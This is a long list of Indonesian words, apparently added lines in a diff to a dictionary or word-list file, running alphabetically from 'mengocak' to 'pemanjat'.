+mengocak
+mengocok
+mengogokkan
+mengolah
+mengoleng
+mengomandokan
+mengombak
+mengombinasikan
+mengomeli
+mengomentari
+mengomidikan
+mengomong
+mengomongkan
+mengompori
+mengompres
+mengonde
+mengondokkan
+mengonfirmasi
+mengongkosi
+mengononkan
+mengonsep
+mengonsolidasikan
+mengonsumsi
+mengontak
+mengontrak
+mengontraskan
+mengontrol
+mengoordinasikan
+mengopeni
+mengoper
+mengoperasi
+mengoperasikan
+mengoplos
+mengoptimalkan
+mengorbankan
+mengorbit
+mengorbitkan
+mengorek
+mengoreksi
+mengorganisasikan
+mengorup
+mengosongkan
+mengotaki
+mengotot
+mengoyak
+mengqasar
+mengsol
+menguak
+menguangi
+menguangkan
+menguap
+menguapi
+menguasai
+menguati
+menguatkan
+mengubah
+mengubak
+menguber
+mengubik
+mengubit
+mengubrakan
+mengubur
+mengucapkan
+mengucek
+mengucilkan
+mengucup
+mengucuri
+mengucurkan
+mengudak
+mengudara
+mengudeta
+mengudung
+menguit
+mengujarkan
+menguji
+mengujudkan
+mengujung
+mengukir
+mengukuhi
+mengukuhkan
+mengukup
+mengukur
+mengukus
+mengulang
+mengulas
+mengulek
+mengulemi
+menguliahi
+menguliti
+mengultuskan
+mengulum
+mengulur
+mengulurkan
+mengumandangkan
+mengumbah
+mengumbang
+mengumbar
+mengumbut
+mengumpak
+mengumpamai
+mengumpamakan
+mengumpan
+mengumpankan
+mengumpar
+mengumpat
+mengumpet
+mengumpul
+mengumpulkan
+mengumumkan
+mengunci
+menguncup
+mengundang
+mengundi
+mengundurkan
+mengunggis
+mengungguli
+mengunggun
+mengunggunkan
+mengunggut
+mengungkai
+mengungkap
+mengungkapkan
+mengungkil
+mengungkit
+mengungkung
+mengungsi
+mengungsikan
+menguning
+mengunjuk
+mengunjungi
+mengunjungkan
+menguntai
+menguntal
+menguntil
+menguntit
+menguntukkan
+menguntungkan
+mengunyah
+mengupah
+mengupam
+mengupas
+mengupayakan
+mengurai
+menguraikan
+mengurangi
+mengurangkan
+mengurapi
+menguras
+mengurbankan
+menguruk
+mengurung
+mengurungkan
+mengurus
+mengurusi
+menguruskan
+mengurut
+mengurutkan
+mengusahakan
+mengusap
+mengusik
+mengusili
+mengusir
+mengusruk
+mengusulkan
+mengusung
+mengusut
+mengutamakan
+mengutang
+mengutarakan
+mengutik
+mengutil
+mengutip
+mengutuhkan
+mengutui
+mengutuk
+mengutus
+meniada
+meniadakan
+meniarap
+meniarapkan
+meniatkan
+menibankan
+menidakkan
+meniduri
+menidurkan
+menikah
+menikahi
+menikahkan
+menikai
+menikam
+menikamkan
+menilai
+menilik
+menimba
+menimbal
+menimbang
+menimbangi
+menimbul
+menimbulkan
+menimbun
+menimbuni
+menimpakan
+meninabobokan
+menindak
+menindan
+menindih
+meninggal
+meninggali
+meninggalkan
+meninggi
+meninggikan
+meningkah
+meningkat
+meningkatkan
+meninju
+menipis
+menipu
+menir
+menirukan
+menirus
+meniruskan
+menitahkan
+menitik
+menitikkan
+menitis
+meniup
+meniupkan
+menjabal
+menjabarkan
+menjabat
+menjadi
+menjadikan
+menjadwalkan
+menjaga
+menjagakan
+menjagal
+menjagoi
+menjagokan
+menjahanamkan
+menjahatkan
+menjahit
+menjaili
+menjaja
+menjajah
+menjajakan
+menjajaki
+menjajal
+menjajar
+menjajari
+menjajarkan
+menjala
+menjalani
+menjalankan
+menjalar
+menjalari
+menjalin
+menjamah
+menjambak
+menjambret
+menjamin
+menjaminkan
+menjampi
+menjamu
+menjangan
+menjangati
+menjangka
+menjangkau
+menjangkitkan
+menjantur
+menjarah
+menjaram
+menjarang
+menjaring
+menjaringkan
+menjarum
+menjatah
+menjatuhkan
+menjawab
+menjawat
+menjawikan
+menjayakan
+menjebak
+menjebeh
+menjebik
+menjebloskan
+menjegil
+menjegilkan
+menjejak
+menjejaki
+menjejakkan
+menjejal
+menjejalkan
+menjejaskan
+menjejerkan
+menjelajah
+menjelanak
+menjelang
+menjengkelit
+menjengkelitkan
+menjengkit
+menjenguk
+menjengukkan
+menjepit
+menjepret
+menjerat
+menjerembap
+menjereng
+menjerit
+menjernihkan
+menjerojol
+menjerukup
+menjerumuskan
+menjewer
+menjijikkan
+menjijit
+menjilat
+menjimbit
+menjinaki
+menjinakkan
+menjinjing
+menjiplak
+menjiwai
+menjodohkan
+menjolok
+menjorok
+menjorokkan
+menjual
+menjuarai
+menjublek
+menjuju
+menjujukan
+menjujut
+menjulai
+menjulang
+menjuling
+menjuluki
+menjulur
+menjulurkan
+menjumpai
+menjumput
+menjunam
+menjunamkan
+menjungkalkan
+menjungkar
+menjungkat
+menjungkirbalikkan
+menjungkirkan
+menjungkit
+menjunjung
+menjuntai
+menjuru
+menjurus
+menobatkan
+menodai
+menodongkan
+menohorkan
+menokoh
+menokok
+menolak
+menolakkan
+menoleh
+menoleransi
+menolok
+menolong
+menomboki
+menonaktifkan
+menongkat
+menongkrongi
+menonjok
+menonjol
+menonjolkan
+menopang
+menopengi
+menora
+menorehkan
+menotal
+menotok
+mensiang
+menskemakan
+mensponsori
+menstabilkan
+menstandarkan
+menstempel
+mensterilkan
+menstimulasi
+menstruasi
+mensyaki
+mensyarahkan
+mensyaratkan
+mensyariatkan
+mensyurkan
+mentah
+mentak
+mental
+mentalitas
+mentang
+mentari
+mentereng
+menteri
+mentok
+mentor
+mentransfer
+mentranskripsikan
+mentul
+menuai
+menuakan
+menuangkan
+menuas
+menubikan
+menubruk
+menubrukkan
+menubuhkan
+menuding
+menuduh
+menuduhkan
+menudungi
+menugasi
+menugaskan
+menujukan
+menujum
+menujumkan
+menukar
+menukas
+menukil
+menukilkan
+menukul
+menulahi
+menulang
+menular
+menularkan
+menulis
+menuliskan
+menumbangkan
+menumbuhkan
+menumbuk
+menumbukka
+menumpahi
+menumpahkan
+menumpangkan
+menumpas
+menumpatkan
+menumplakkan
+menumpu
+menumpuk
+menumpukan
+menumpukkan
+menumpur
+menunaikan
+menunangi
+menunangkan
+menunda
+menunduk
+menundukkan
+menundung
+menung
+menunggak
+menunggang
+menunggangi
+menunggangkan
+menungging
+menunggingkan
+menunggu
+menunggui
+menungkul
+menunjukkan
+menuntaskan
+menuntun
+menuntungkan
+menuntut
+menunukan
+menur
+menurun
+menurunkan
+menurut
+menuruti
+menusuk
+menusukkan
+menutuk
+menutulkan
+menutup
+menutupi
+menutupkan
+menuturkan
+menyabarkan
+menyabdakan
+menyabit
+menyablon
+menyabot
+menyabung
+menyabungkan
+menyabur
+menyaburkan
+menyadap
+menyadau
+menyadikkan
+menyadran
+menyadur
+menyagang
+menyahajakan
+menyahihkan
+menyahut
+menyaingi
+menyaingkan
+menyajak
+menyajikan
+menyakal
+menyakar
+menyakat
+menyakiti
+menyakitkan
+menyakukan
+menyala
+menyalahgunakan
+menyalahi
+menyalahkan
+menyalai
+menyalak
+menyalakan
+menyalami
+menyalang
+menyalibkan
+menyalin
+menyalip
+menyalurkan
+menyalut
+menyamai
+menyamakan
+menyaman
+menyamar
+menyamarkan
+menyambang
+menyambangi
+menyambar
+menyambat
+menyambit
+menyambut
+menyampah
+menyampaikan
+menyampangkan
+menyamperi
+menyampirkan
+menyampuk
+menyampukkan
+menyampul
+menyamun
+menyandakan
+menyandal
+menyandarkan
+menyandera
+menyangai
+menyangatkan
+menyangga
+menyanggah
+menyanggam
+menyanggang
+menyanggep
+menyanggit
+menyanggul
+menyanggupi
+menyangka
+menyangkak
+menyangkal
+menyangkap
+menyangkarkan
+menyangkut
+menyangkutkan
+menyangrai
+menyangsang
+menyangsikan
+menyanjung
+menyantap
+menyantet
+menyantun
+menyantuni
+menyanyi
+menyanyikan
+menyapa
+menyapu
+menyapukan
+menyaput
+menyarak
+menyarangkan
+menyarankan
+menyarap
+menyarapi
+menyarikan
+menyaring
+menyaringkan
+menyaru
+menyaruk
+menyarung
+menyarungkan
+menyarut
+menyasap
+menyasar
+menyasarkan
+menyasau
+menyatakan
+menyatroni
+menyatu
+menyatukan
+menyaur
+menyawar
+menyayangi
+menyayangkan
+menyayat
+menyayukan
+menyebabkan
+menyebal
+menyebalkan
+menyebar
+menyebarkan
+menyebarluaskan
+menyebat
+menyebaurkan
+menyebelah
+menyebelahi
+menyebelahkan
+menyeberang
+menyeberangi
+menyebit
+menyebrot
+menyebu
+menyebuk
+menyebut
+menyebutkan
+menyedang
+menyedapkan
+menyedekahi
+menyedekahkan
+menyederhanakan
+menyediakan
+menyedihkan
+menyedikitkan
+menyedot
+menyeduh
+menyegani
+menyegarkan
+menyegehi
+menyegel
+menyegerakan
+menyehatkan
+menyeimbangkan
+menyejahterakan
+menyejajarkan
+menyejarahkan
+menyejukkan
+menyeka
+menyekakan
+menyekap
+menyekar
+menyekat
+menyekop
+menyekutui
+menyekutukan
+menyela
+menyelakkan
+menyelamati
+menyelamatkan
+menyelami
+menyelamkan
+menyelang
+menyelangkupi
+menyelap
+menyelaput
+menyelaraskan
+menyelat
+menyelatkan
+menyeleksi
+menyelempangkan
+menyelenggarakan
+menyelentik
+menyelesaikan
+menyeleweng
+menyelewengkan
+menyelia
+menyelidik
+menyelidiki
+menyelimuti
+menyelinap
+menyelinapkan
+menyelingi
+menyelip
+menyelipi
+menyelipkan
+menyelisihkan
+menyelisik
+menyelit
+menyelitkan
+menyelongsongi
+menyelubungi
+menyelundupkan
+menyeluruh
+menyeluruhi
+menyelusur
+menyemaikan
+menyemak
+menyemakkan
+menyemangati
+menyemarakkan
+menyemayamkan
+menyembah
+menyembahkan
+menyembelih
+menyembilu
+menyemboyankan
+menyembuhkan
+menyembunyikan
+menyembur
+menyemburi
+menyemburkan
+menyemir
+menyempadani
+menyempal
+menyempatkan
+menyempilkan
+menyempit
+menyempitkan
+menyemprot
+menyemprotkan
+menyempurnakan
+menyemu
+menyemukakan
+menyemut
+menyenakkan
+menyenangi
+menyenangkan
+menyenaraikan
+menyendat
+menyendatkan
+menyendi
+menyendiri
+menyendirikan
+menyendok
+menyengaja
+menyengajakan
+menyengapkan
+menyengat
+menyenggak
+menyenggangkan
+menyenggol
+menyengguk
+menyengit
+menyengkelit
+menyengsarakan
+menyensor
+menyentak
+menyentakkan
+menyentuh
+menyenyeh
+menyepadankan
+menyepak
+menyepakati
+menyepakkan
+menyepelekan
+menyepertikan
+menyepi
+menyepuh
+menyeragamkan
+menyerah
+menyerahkan
+menyerak
+menyerakkan
+menyeramkan
+menyerang
+menyerangkaikan
+menyeranikan
+menyerapahi
+menyerasika
+menyeratkan
+menyerbeti
+menyerbu
+menyerbuk
+menyerbuki
+menyerempak
+menyerempakkan
+menyerentakkan
+menyeret
+menyergah
+menyergap
+menyerikan
+menyerikati
+menyerikatkan
+menyeringai
+menyerobot
+menyerok
+menyerong
+menyerongkan
+menyerpih
+menyertai
+menyertakan
+menyeru
+menyeruak
+menyeruduk
+menyerukan
+menyerupai
+menyerupakan
+menyeruput
+menyerut
+menyervis
+menyesak
+menyesaki
+menyesakkan
+menyesali
+menyesalkan
+menyesap
+menyesatkan
+menyesuaikan
+menyetarafkan
+menyetarakan
+menyetel
+menyetem
+menyetik
+menyetimbangkan
+menyetip
+menyetir
+menyetop
+menyetrap
+menyetrip
+menyetujui
+menyiagakan
+menyiangi
+menyiapkan
+menyiasat
+menyiasati
+menyibakkan
+menyibukkan
+menyidangkan
+menyidik
+menyigi
+menyihir
+menyikat
+menyiksa
+menyiku
+menyikut
+menyilakan
+menyilam
+menyilamkan
+menyilang
+menyilangkan
+menyilap
+menyilat
+menyilih
+menyimbolkan
+menyimbur
+menyimpai
+menyimpan
+menyimpang
+menyimpangkan
+menyimpul
+menyimpulkan
+menyimulasikan
+menyinambungkan
+menyinar
+menyinari
+menyinarkan
+menyindir
+menyinggahkan
+menyinggung
+menyingkap
+menyingkapkan
+menyingkat
+menyingkirkan
+menyingsetkan
+menyingsingkan
+menyinkronkan
+menyirih
+menyirnakan
+menyisakan
+menyisi
+menyisih
+menyisihkan
+menyisikan
+menyisipi
+menyisipkan
+menyisir
+menyita
+menyitir
+menyobati
+menyobek
+menyodok
+menyodori
+menyodorkan
+menyokong
+menyombong
+menyombongkan
+menyongsong
+menyopiri
+menyorong
+menyorongkan
+menyorot
+menyoroti
+menyorotkan
+menyuakan
+menyuap
+menyuapi
+menyuar
+menyuarakan
+menyuasanai
+menyubsidi
+menyuburkan
+menyucihamakan
+menyucikan
+menyudahi
+menyudikan
+menyudut
+menyudutkan
+menyuguhkan
+menyukai
+menyukat
+menyulam
+menyulap
+menyulih
+menyulitkan
+menyuluh
+menyulut
+menyumbang
+menyumbangkan
+menyumbat
+menyumpahi
+menyumpal
+menyumsum
+menyunat
+menyunatkan
+menyundul
+menyundut
+menyungguhkan
+menyungkal
+menyungkit
+menyungkup
+menyungkur
+menyungsang
+menyungsangkan
+menyuntikkan
+menyunting
+menyuntingkan
+menyuplai
+menyurai
+menyuramkan
+menyurat
+menyuratkan
+menyurihkan
+menyuruh
+menyuruk
+menyurukkan
+menyuruti
+menyurutkan
+menyurvei
+menyusahkan
+menyusu
+menyusui
+menyusuk
+menyusul
+menyusulkan
+menyusun
+menyusup
+menyusupkan
+menyusur
+menyusuri
+menyusutkan
+menyuwir
+menziarahi
+menzikirkan
+mepet
+meraba
+merabak
+merabuk
+merabung
+merabunkan
+merabut
+meracau
+meracik
+meracuni
+meradang
+meradukan
+meragamkan
+meragang
+meragas
+meragikan
+meragukan
+merah
+merahasiakan
+merahmati
+meraih
+merajah
+merajahkan
+merajai
+merajalela
+merajam
+merajang
+merajuk
+merajut
+merakit
+merakus
+meramaikan
+meramalkan
+merambah
+merambak
+merambakkan
+meraminkan
+merampak
+merampas
+merampingkan
+merampok
+merampungkan
+merana
+merancang
+merancukan
+meranda
+merang
+meranggah
+meranggas
+meranggikan
+meranggitkan
+merangka
+merangkaikan
+merangkak
+merangkaki
+merangkap
+merangkul
+merangkum
+merangkumi
+merangsang
+merangsangkan
+merantai
+merantau
+meranting
+merapat
+merapikan
+merapunkan
+merasai
+merasuki
+merata
+meratakan
+meraung
+meraup
+meraut
+merawal
+merawankan
+merawat
+merawi
+merawikan
+merayah
+merayakan
+merayap
+merayapi
+merayu
+merbah
+merbuk
+mercik
+mercon
+mercu
+mercusuar
+merdeka
+merdesa
+merdu
+merebahkan
+merebak
+merebat
+merebus
+merebut
+merecik
+meredup
+merefleksikan
+meregang
+merejan
+merejang
+merek
+merekah
+merekakan
+merekam
+merekamkan
+merekat
+merekatkan
+mereklamekan
+merekrut
+merelai
+merelaikan
+merelakan
+merem
+meremajakan
+meremang
+merembes
+merembet
+meremukkan
+merencanakan
+merenda
+merendahkan
+merendamkan
+merendang
+merendap
+merengat
+merengek
+merenggangi
+merenggangkan
+merenggut
+merenggutkan
+merengkeh
+merengkuh
+merengut
+merentak
+merentakkan
+merentangkan
+merentas
+merenungkan
+merenyukkan
+merenyutkan
+merepang
+merepet
+merepih
+meresahkan
+meresap
+meresik
+merestui
+meretas
+mergat
+merger
+meriah
+meriakan
+meriam
+meriang
+meriangkan
+merias
+meriba
+meributkan
+merica
+meridian
+merih
+merimbas
+merimbun
+merinai
+merincis
+merindingkan
+merindu
+meringankan
+meringik
+meringis
+meringkaskan
+meringkik
+meringking
+meringkuk
+meringkus
+merintangi
+merintih
+merintis
+merisau
+merisaukan
+meriuhkan
+meriwayatkan
+merjan
+merkurium
+merkurius
+merlimau
+merlip
+merobek
+merobekkan
+merobohkan
+merogoh
+merojol
+merombak
+merompak
+meronce
+meronda
+meronggeng
+merongos
+merongrong
+merontokkan
+merot
+meroyalkan
+merpati
+merta
+mertua
+meruah
+meruahkan
+meruak
+merubung
+merugi
+merugikan
+merujuk
+merujukkan
+merukuk
+merukunkan
+merumitkan
+merumpi
+merumput
+merumputi
+merumuskan
+meruncing
+meruncingkan
+merunding
+merundingkan
+merunduk
+merundukkan
+merungguh
+merungguhkan
+merungkup
+merungut
+merunguti
+merunjung
+merunsing
+merunsingkan
+meruntuh
+meruntuhkan
+meruntunkan
+merunut
+merunuti
+merunyamkan
+merupa
+merupakan
+merusaki
+merusakkan
+merusuhkan
+merusuk
+merut
+merutuk
+meruwat
+meruwetkan
+meruyup
+meruyupkan
+mes
+mesa
+mesem
+mesin
+mesiu
+mesjid
+meski
+meskipun
+mesmerisme
+mesra
+mesti
+mestika
+mesum
+meta
+metafisika
+metafisis
+metafor
+metaforis
+metal
+metamorfosis
+metari
+meteorit
+meterai
+metir
+metode
+metodis
+metropolitan
+metrum
+mewabah
+mewadahi
+mewah
+mewahyukan
+mewajibkan
+mewakafkan
+mewakili
+mewakilkan
+mewalakkan
+mewangi
+mewangikan
+mewarisi
+mewariskan
+mewarnai
+mewartakan
+mewasiatkan
+mewatasi
+mewawancarai
+mewayangkan
+mewisuda
+mewujudkan
+meyakini
+meyakinkan
+mi
+miang
+midi
+midik
+migrasi
+mika
+mikrob
+mikrobiologi
+mikrokosmos
+mikroorganisme
+mikroskop
+mileu
+miliarder
+milik
+milisi
+militan
+militer
+miliun
+miliuner
+milu
+mimbar
+mimeograf
+mimesis
+mimi
+mimikri
+mimisan
+mimpi
+mina
+minang
+minat
+minder
+mineral
+minggat
+minggu
+minggung
+mini
+miniatur
+minim
+minimal
+minimum
+minium
+minor
+minta
+mintak
+mintakat
+mintuna
+minum
+minus
+minyak
+miopia
+mirakel
+mirat
+miriapod
+miring
+mirip
+miris
+misa
+misai
+misal
+misbah
+misi
+misil
+misinterpretasi
+misionaris
+miskin
+miskram
+mistar
+misteri
+misterius
+mistik
+mistis
+mite
+mitos
+mitra
+mitraliur
+mizan
+mobil
+mobilisasi
+mobilitas
+modal
+mode
+model
+moderat
+moderator
+modern
+modernisasi
+modernitas
+modifikasi
+modin
+modis
+moga
+mogok
+mohon
+molar
+molek
+molekul
+molor
+momen
+momentum
+momok
+momong
+momongan
+monarki
+moncong
+mondial
+moneter
+mongkok
+mongmong
+monitor
+monografi
+monolog
+monopoli
+monoton
+montase
+montir
+montok
+monumen
+monumental
+monyet
+monyong
+moral
+moralitas
+moratorium
+moreng
+morfologi
+morong
+mortalitas
+mortir
+mosi
+motel
+motif
+motivasi
+moto
+motong
+motor
+moyang
+muai
+muak
+mual
+mualamat
+mualim
+muara
+muas
+muat
+muatan
+muazin
+mubalig
+mubazir
+muda
+mudah
+mudahan
+mudarat
+mudi
+mudigah
+mudik
+mudin
+mufakat
+mufasir
+mufrad
+muhajat
+muhajir
+muhami
+muhibah
+muja
+mujarab
+mujarad
+muji
+mujur
+muka
+mukadimah
+mukados
+mukah
+mukang
+mukena
+mukhlis
+mukim
+mukjizat
+muktabar
+muktamal
+muktamar
+mukul
+mukun
+mula
+mulai
+mulas
+mulhid
+mulia
+multifaset
+multipel
+multiplikasi
+multiplikator
+multiplisitas
+muluk
+mulus
+mulut
+mumbang
+mumbul
+mumbung
+mumpung
+mumpuni
+mumuk
+munafik
+munajim
+munasabah
+muncang
+munci
+muncikari
+muncrat
+muncul
+muncung
+mundam
+mundi
+munding
+mundur
+mungil
+mungkar
+mungkin
+mungkir
+mungkum
+mungkur
+mungmung
+mungu
+mungut
+munib
+munjung
+muno
+munsyi
+muntah
+muntahi
+muntul
+murad
+muradif
+murah
+murahan
+muram
+murang
+murba
+murid
+muring
+murka
+murni
+murtad
+murung
+murup
+murus
+musaadah
+musafir
+musakat
+musala
+musang
+musibah
+musik
+musikolog
+musim
+muskil
+muslihat
+muslim
+musnah
+mustahak
+mustahil
+mustaid
+mustajab
+mustakim
+mustami
+musuh
+musyawarah
+musytari
+mutakadim
+mutakalim
+mutakhir
+mutasi
+mutiara
+mutilasi
+mutlak
+mutu
+mutung
+muwalat
+muzaki
+nabi
+nada
+nadam
+nadanya
+nadi
+nadir
+nafas
+nafi
+nafkah
+nafsi
+nafsu
+naga
+nagak
+nagari
+nah
+nahan
+nahas
+nahi
+nahu
+naif
+naik
+najis
+nakal
+nakara
+nakhoda
+nakuti
+nala
+nalar
+naluri
+naluriah
+nama
+nambahi
+namnam
+nampan
+namun
+nan
+nanah
+nanai
+nanang
+nanap
+nanar
+nang
+nanggung
+nangka
+nangkring
+nantaboga
+nanti
+nanyan
+napal
+napan
+napas
+napuh
+nara
+narapati
+narapidana
+narasi
+narasumber
+narator
+nari
+narwastu
+nas
+nasab
+nasabah
+nasal
+nasalisasi
+nasar
+nasi
+nasib
+nasihat
+nasion
+nasional
+nasionalis
+nasionalisasi
+nasionalisme
+nasionalistis
+naskah
+nasofaring
+nasrani
+nat
+natang
+nati
+natijah
+natrium
+natur
+natural
+naturalisasi
+naturalisme
+naungan
+nautikal
+navigasi
+nayaka
+nayam
+nazar
+nefrologi
+negara
+negasi
+negatif
+negeri
+negosiasi
+nekara
+nekat
+neko
+nenek
+nenen
+nenes
+neolitikum
+neraca
+net
+neto
+netra
+netral
+netralisasi
+netralitas
+ngais
+ngarai
+ngarang
+ngatai
+ngejar
+ngengat
+ngepak
+ngepakkan
+ngerat
+ngiang
+ngibaskan
+ngilik
+ngilu
+ngira
+ngorek
+ngosan
+ngoyak
+ngucek
+ngutik
+nia
+niagawan
+nian
+niat
+nifak
+nikah
+nila
+nilai
+nilam
+nilik
+nilon
+nimang
+nimbang
+nini
+nipiskan
+nira
+nirai
+niraksara
+nirmala
+niru
+nirwana
+nisan
+nisbah
+nisbi
+niscaya
+niskala
+nitrogren
+nobat
+nocat
+noda
+noktah
+nol
+nomad
+nomenklatur
+nomina
+nominal
+nominasi
+nomine
+nomor
+nomplok
+nona
+nonaktif
+nonblok
+nongkrong
+nongnong
+nonsens
+nonstop
+norak
+norma
+normal
+normatif
+not
+nota
+notabene
+notak
+notasi
+notes
+notifikasi
+notula
+novel
+novela
+nuansa
+nubuat
+nujum
+nukilan
+nukleus
+numeralia
+nunda
+nur
+nurani
+nusuk
+nutrisionis
+nya
+nyak
+nyala
+nyalang
+nyalar
+nyali
+nyaman
+nyamikan
+nyampang
+nyamuk
+nyamur
+nyanjung
+nyanyang
+nyanyar
+nyanyian
+nyap
+nyapang
+nyaring
+nyata
+nyawa
+nyedang
+nyelekit
+nyendi
+nyendih
+nyengguk
+nyengir
+nyentrik
+nyentuh
+nyenyai
+nyenyak
+nyenyat
+nyeret
+nyeri
+nyerong
+nyiakan
+nyinggung
+nyiru
+nyiur
+nyolong
+nyonyong
+nyonyor
+nyunyut
+nyuruk
+nyut
+nyutan
+oasis
+obat
+obeng
+obesitas
+objek
+objektif
+objektivitas
+obligasi
+obor
+obral
+obrol
+obrolan
+observasi
+obsesi
+obsesif
+obsidian
+obsolet
+obstetri
+obstruksi
+obstulen
+oceh
+ocehan
+odoh
+odokolonye
+odol
+odoran
+oga
+ogah
+ogak
+ogel
+ogok
+oja
+oke
+oknum
+oksigen
+oktagon
+oktroi
+okuler
+okulis
+okultis
+okultisme
+olah
+olahan
+olahraga
+olahragawan
+olak
+oleh
+olek
+oleng
+oles
+oligofremia
+oliva
+olok
+om
+oma
+ombak
+omel
+omelan
+omnivor
+omong
+omongan
+ompong
+onak
+oncor
+onderdil
+onggok
+onggokan
+ongkang
+ongkos
+onomatope
+onyok
+onyot
+opa
+open
+operan
+operandi
+operasi
+operasionalisasi
+opini
+opium
+oplah
+oplos
+oplosan
+opname
+oponen
+oportunitas
+oposisi
+opsi
+opsional
+optimal
+optimistis
+optimum
+optis
+orak
+oral
+orang
+oranye
+orasi
+orator
+orbit
+orde
+order
+ordinansi
+ordo
+organ
+organisasi
+organisator
+organisme
+orientasi
+orisinal
+orisinalitas
+ornamen
+ornamental
+orok
+orong
+ortodoks
+ortodoksi
+osean
+osifikasi
+osteologi
+osteoporosis
+otak
+otek
+otentik
+otentisitas
+oto
+otomatis
+otomatisasi
+otonom
+otonomi
+otopsi
+otoritas
+otoritatif
+otoriter
+otot
+oval
+ovarium
+oven
+over
+overaktif
+ovulum
+ovum
+oyong
+oyot
+ozon
+pa
+pabean
+pabrik
+pabrikan
+pacak
+pacangan
+pacar
+pacaran
+pace
+paceklik
+pacet
+pacok
+pacu
+pacuan
+pacul
+pada
+padahal
+padam
+padan
+padanan
+padang
+padas
+padasan
+padat
+padi
+padma
+padmasana
+padmi
+padri
+padu
+paduan
+paduka
+paes
+paesan
+pagan
+pagar
+pagebluk
+pagelaran
+pagi
+pagina
+pagoda
+pagon
+pagu
+pagupon
+pagut
+pagutan
+paguyuban
+paha
+pahala
+paham
+pahat
+pahatan
+pahit
+pahlawan
+pail
+pailit
+pair
+pais
+pajak
+pajang
+pajangan
+pajuh
+pak
+pakai
+pakaian
+pakan
+pakar
+pakcik
+pakcoi
+pakde
+pakem
+paket
+pakis
+paklik
+pakpui
+paksa
+paksaan
+paksi
+paksina
+pakta
+paku
+pakuncen
+pakus
+pal
+palagan
+palai
+palak
+palam
+palamarta
+palang
+palar
+palas
+paldu
+paleolitikum
+paling
+palit
+palka
+palmin
+palmistri
+palsu
+palu
+paluan
+palun
+palung
+palut
+paman
+pamer
+pameran
+pamflet
+pamit
+pamong
+pamor
+pampang
+pampasan
+pampat
+pamrih
+pana
+panah
+panai
+panas
+panca
+pancalogam
+pancalongok
+pancamuka
+pancang
+pancar
+pancaragam
+pancaran
+pancaroba
+pancarona
+pancawarna
+pancawarsa
+panci
+pancing
+pancingan
+pandai
+pandak
+pandang
+pandangan
+pandemi
+pandir
+pandu
+panduan
+panen
+pangan
+pangeran
+pangestu
+panggil
+panggilan
+panggul
+panggung
+pangkal
+pangkalan
+pangkas
+pangkat
+pangkeng
+pangku
+pangkuan
+pangkur
+panglima
+pangling
+pangonan
+pangsa
+pangsi
+pangur
+pangus
+panik
+paniradya
+panitera
+panitia
+panjang
+panjar
+panjat
+panji
+panjul
+pankreas
+panorama
+pantai
+pantalon
+pantang
+pantangan
+pantas
+pantat
+pantauan
+pantek
+panti
+panting
+pantomim
+pantul
+pantulan
+pantun
+papa
+papah
+papak
+papakerma
+papan
+papar
+paparan
+papi
+para
+parabel
+parade
+paradigma
+paradigmatis
+paradoks
+paradoksal
+paraf
+parafin
+parafrase
+paragraf
+parah
+parak
+paralel
+paralelisme
+paralelogram
+paralisis
+paramasastra
+parameter
+paran
+parang
+paranormal
+paras
+parasit
+parasut
+parasutis
+parau
+pare
+parentesis
+parfum
+parih
+paripurna
+parit
+paritas
+pariwara
+pariwarta
+pariwisata
+parlemen
+parodi
+parokial
+parsial
+partai
+partikel
+partikelir
+partisan
+partisi
+partisipan
+partisipasi
+partner
+partus
+paru
+paruh
+parut
+pas
+pasah
+pasai
+pasak
+pasal
+pasang
+pasangan
+pasar
+pasaran
+paseban
+paser
+pasien
+pasif
+pasifikasi
+pasilan
+pasir
+pasok
+pasokan
+pasrah
+pasta
+pasti
+pastor
+pastura
+pasuk
+pasukan
+pasung
+patah
+patahan
+pataka
+patar
+patek
+patela
+paten
+pater
+paternal
+paternalistis
+patetis
+patgulipat
+pati
+patih
+patik
+patil
+pating
+patogen
+patok
+patokan
+patos
+patri
+patriark
+patriarkat
+patrilineal
+patriot
+patriotik
+patroli
+patron
+patronasi
+patrun
+patuh
+patuk
+patukan
+patung
+patut
+paus
+pause
+paut
+pautan
+paviliun
+pawai
+pawang
+paya
+payah
+payang
+payau
+payu
+payudara
+payung
+pecah
+pecahan
+pecak
+pecandu
+peci
+pecicilan
+pecinan
+pecut
+peda
+pedagang
+pedagog
+pedagogi
+pedal
+pedalaman
+pedamaran
+pedandan
+pedang
+pedar
+pedas
+pedati
+pedengan
+pedepokan
+pedestrian
+pedet
+pedih
+pedoman
+pedukuhan
+peduli
+pedupaan
+pegadaian
+pegal
+pegan
+pegangan
+pegas
+pegat
+pegawai
+pegiat
+pegun
+pegunungan
+pehong
+pejabat
+pejagalan
+pejajaran
+pejal
+pejam
+pek
+peka
+pekak
+pekamus
+pekan
+pekarangan
+pekasam
+pekasih
+pekat
+pekau
+pekebun
+pekerja
+pekerjaan
+pekerti
+pekik
+peking
+pekuburan
+pekuk
+pekung
+pel
+pelabuhan
+pelacak
+pelacakan
+pelacur
+pelacuran
+peladang
+peladen
+peladenan
+pelafalan
+pelajar
+pelajaran
+pelak
+pelaksana
+pelaksanaan
+pelaku
+pelaminan
+pelampiasan
+pelampung
+pelamun
+pelan
+pelana
+pelancong
+pelancongan
+pelanduk
+pelanggan
+pelanggaran
+pelangi
+pelangkin
+pelangsingan
+pelanjut
+pelantar
+pelantikan
+pelanting
+pelapisan
+pelapor
+pelaporan
+pelarangan
+pelarian
+pelarutan
+pelat
+pelataran
+pelatih
+pelatihan
+pelatuk
+pelaut
+pelawa
+pelawaan
+pelawak
+pelawan
+pelayan
+pelayanan
+pelbagai
+pelebaya
+peleburan
+peleceh
+pelecok
+pelembungan
+pelencit
+pelengkap
+pelengseran
+pelepah
+pelepas
+pelepasan
+pelerai
+peleraian
+pelesapan
+peleset
+pelesetan
+pelesit
+pelestarian
+pelet
+peletak
+peletakan
+pelicin
+pelicinan
+pelihara
+peliharaan
+pelik
+pelimbahan
+pelimpahan
+pelindung
+pelintasan
+pelintir
+pelipis
+pelipur
+peliput
+peliputan
+pelir
+pelit
+pelita
+pelitur
+pelo
+peloh
+pelopor
+pelor
+pelosok
+pelosot
+peluang
+pelubang
+pelubangan
+peludahan
+peluh
+peluit
+peluk
+pelukan
+pelukis
+pelumpung
+peluntur
+pelupuk
+peluru
+pelurusan
+pelvis
+pemaaf
+pemaafan
+pemabuk
+pemadat
+pemagaran
+pemahaman
+pemahat
+pemain
+pemair
+pemakai
+pemakaian
+pemakaman
+pemakan
+pemakluman
+pemalak
+pemalam
+pemalas
+pemali
+pemaling
+pemalsuan
+pemalu
+pemalut
+pemampat
+pemanas
+pemancar
+pemancaran
+pemandangan
+pemandian
+pemandu
+pemanfaatan
+pemanggil
+pemangkas
+pemangku
+pemangsa
+pemanjat
